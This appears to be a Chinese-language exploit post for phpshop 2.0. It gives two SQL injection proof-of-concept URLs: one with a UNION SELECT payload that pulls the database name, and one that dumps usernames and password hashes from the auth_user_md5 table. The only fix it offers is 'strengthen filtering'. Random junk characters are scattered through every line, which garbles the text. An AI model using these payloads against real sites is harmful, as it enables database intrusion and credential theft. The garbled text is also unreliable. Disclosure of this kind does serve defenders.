标题 : phpshop 2.0 SQL Injection Vulnerability' r. h0 W& s7 @
$ ?/ N, t Z! S1 i作者 : By onestree
3 z& J) {& X$ ^4 F" ]4 T6 j下载地址 : http://code.google.com/p/phpshop/downloads/list
; X/ c8 V' H- b) l* t测试地址: windows 7 / ubuntu! |1 u( _' v# C- E5 G7 ]/ p* J
% H7 b: x6 B. Q2 y; w4 J
: q8 n% A/ B- u+ P. ^, hSQLi p0c:
4 z& W) p) I8 k: T3 c
* o4 {6 V; i4 i6 X% {. C9 @. g==================; L, V# F% e9 C% K; c# i
% H, u6 ^$ k! Z* ~
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'$ u: Q, z( N* s. f) y) V
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --% _! ?) c' Q8 Q! S* g5 Q
( R5 a6 v7 Y; I) J! v" e7 ?# N5 P
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
. q7 G: }& L1 C9 n. w" O8 a m, X# c
修复:0 D1 ~2 G2 j9 F/ V/ i
加强过滤+ i! N4 O( | x8 ~0 u4 d& n2 A
/ ]% L+ c M4 F! p4 ?( I) A. o6 d5 r @4 d6 C: D
|